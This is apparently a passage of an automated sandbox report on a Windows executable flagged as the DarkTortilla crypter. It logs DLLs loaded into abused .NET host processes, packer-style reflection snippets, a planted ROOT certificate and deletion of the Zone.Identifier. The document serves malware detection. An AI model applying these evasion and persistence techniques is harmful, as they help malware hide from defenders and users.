Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: linkinfo.dll	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Google Chrome.lnk.9.dr

LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 2M1NS61GG8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 2M1NS61GG8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 2M1NS61GG8.exe

Static file information: File size 5382656 > 1048576

Source: 2M1NS61GG8.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x519200

Source: 2M1NS61GG8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dllO source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 4.2.AddInProcess32.exe.4ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.AddInProcess32.exe.4ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2512707463.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2478930846.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7600, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2M1NS61GG8.exe, Tk.cs	.Net Code: NewLateBinding.LateCall(NewLateBinding.LateIndexGet(NewLateBinding.LateGet(obj4, (Type)null, "GetMethods", new object[0], (string[])null, (Type[])null, (bool[])null), new object[1] { 0 }, (string[])null), (Type)null, "Invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	.Net Code: O7smv2f0AR
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	.Net Code: UYdFMNjxJ9
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	.Net Code: O7smv2f0AR
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	.Net Code: UYdFMNjxJ9

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D7920 pushad ; ret	0_2_083D792D
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_083D6443 pushad ; ret	0_2_083D6449
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E744F3B push cs; retf	0_2_0E744F3C
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E748F0E push 08418B05h; ret	0_2_0E748F13
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E74EA88 push es; mov dword ptr [esp], eax	0_2_0E74EAAB
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7459E3 push ecx; ret	0_2_0E7459EC
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7409AB pushad ; iretd	0_2_0E7409B5
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79C6C3 push cs; ret	0_2_0E79C6C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E695A8 pushad ; ret	4_2_06E69B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E69AA5 pushad ; ret	4_2_06E69B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E68090 push ecx; ret	4_2_06E680A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E6805F pushad ; ret	4_2_06E68063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07196596 push esi; retf	4_2_07196597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07196D82 push 0000005Eh; retf	4_2_07196D84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071B5906 push esi; retf	4_2_071B590A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071B4CBD push ecx; retf 0040h	4_2_071B4CBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043F552 push ecx; retf	8_2_0043F559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00440758 push ecx; retf	8_2_00440759
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043DA78 push ECE0CD30h; ret	8_2_0043DABE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043DAC5 push ECE0CD30h; ret	8_2_0043DABE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043DAA8 push ECE0CD30h; ret	8_2_0043DABE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_050C2068 pushfd ; iretd	9_2_050C2069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720A57F push dword ptr [esp+ecx*2-75h]; ret	9_2_0720A583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720C446 push esi; retf	9_2_0720C447
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720B3DB push FFFFFF8Bh; retf	9_2_0720B3DD

Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	High entropy of concatenated method names: 'cVPWYtTsup', 'L0jWo2OHZx', 'V2ZWRbWftC', 'UNoWycJ8BL', 'uXbWD2bfL9', 'OyAW32iCth', 'NqYWesuwMC', 'ovMpyvNF5Q', 'IiyWl7pfJj', 'oG0W7W3ujx'
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	High entropy of concatenated method names: 'YGard6El1G', 'g38PJ8K3c0', 'JLNrY0oRkM', 'PUDro8LIgH', 'CVmrRys6yS', 'l75rygIfeK', 'Vt68hxKv4v', 'iHlVsUddhI', 'eAyViyhiwA', 'IkaV0Uy824'
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, GBTUbFrKl8ZAVSTVPtO.cs	High entropy of concatenated method names: 'cVPWYtTsup', 'L0jWo2OHZx', 'V2ZWRbWftC', 'UNoWycJ8BL', 'uXbWD2bfL9', 'OyAW32iCth', 'NqYWesuwMC', 'ovMpyvNF5Q', 'IiyWl7pfJj', 'oG0W7W3ujx'
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	High entropy of concatenated method names: 'YGard6El1G', 'g38PJ8K3c0', 'JLNrY0oRkM', 'PUDro8LIgH', 'CVmrRys6yS', 'l75rygIfeK', 'Vt68hxKv4v', 'iHlVsUddhI', 'eAyViyhiwA', 'IkaV0Uy824'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	File opened: C:\Users\user\Desktop\2M1NS61GG8.exe\:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe\:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
